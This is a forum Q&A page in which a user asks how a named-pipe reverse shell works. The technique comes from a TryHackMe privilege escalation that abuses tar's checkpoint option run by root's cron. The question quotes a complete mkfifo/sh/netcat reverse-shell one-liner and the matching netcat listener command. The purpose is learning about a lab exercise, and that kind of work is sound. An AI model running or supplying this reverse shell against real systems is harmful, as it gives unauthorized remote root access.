Communities

Writing
Writing
Codidact Meta
Codidact Meta
The Great Outdoors
The Great Outdoors
Photography & Video
Photography & Video
Scientific Speculation
Scientific Speculation
Cooking
Cooking
Electrical Engineering
Electrical Engineering
Judaism
Judaism
Languages & Linguistics
Languages & Linguistics
Software Development
Software Development
Mathematics
Mathematics
Christianity
Christianity
Code Golf
Code Golf
Music
Music
Physics
Physics
Linux Systems
Linux Systems
Power Users
Power Users
Tabletop RPGs
Tabletop RPGs

Dashboard
Notifications
Mark all as read
Q&A

Reverse shell with named pipe and netcat

+2
−0

This blog post describes a privilege escalation, exploiting tar's --checkpoint-action option. The privilege escalation is used to solve a TryHackMe challenge.

The root user calls tar via cron which causes a script with the following content to run (I adapted the script a bit):

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 4445 > /tmp/f

I'm trying to wrap my head around the interaction between cat, sh, netcat, and the named pipe /tmp/f.

Here's my literal reading of the command:

  1. Create a new named pipe at /tmp/f.
  2. Write the contents of /tmp/f to an interactive shell.
  3. Write the output of the shell to netcat.
  4. The output of netcat is written to the named pipe /tmp/f.

After running the command and creating a listening netcat server locally with nc -lvnp 4445 I indeed got root access.

I have a rough intuition that the steps above create an input/output loop between netcat and the shell but I'd love to deepen my knowledge on how this works.

Why does this post require moderator attention?
You might want to add some details to your flag.
Why should this post be closed?

1 comment thread

Your hunch is right (1 comment)

0 answers

Sign up to answer this question »

This community is part of the Codidact network. We have other communities too — take a look!

You can also join us in chat!

Want to advertise this community? Use our templates!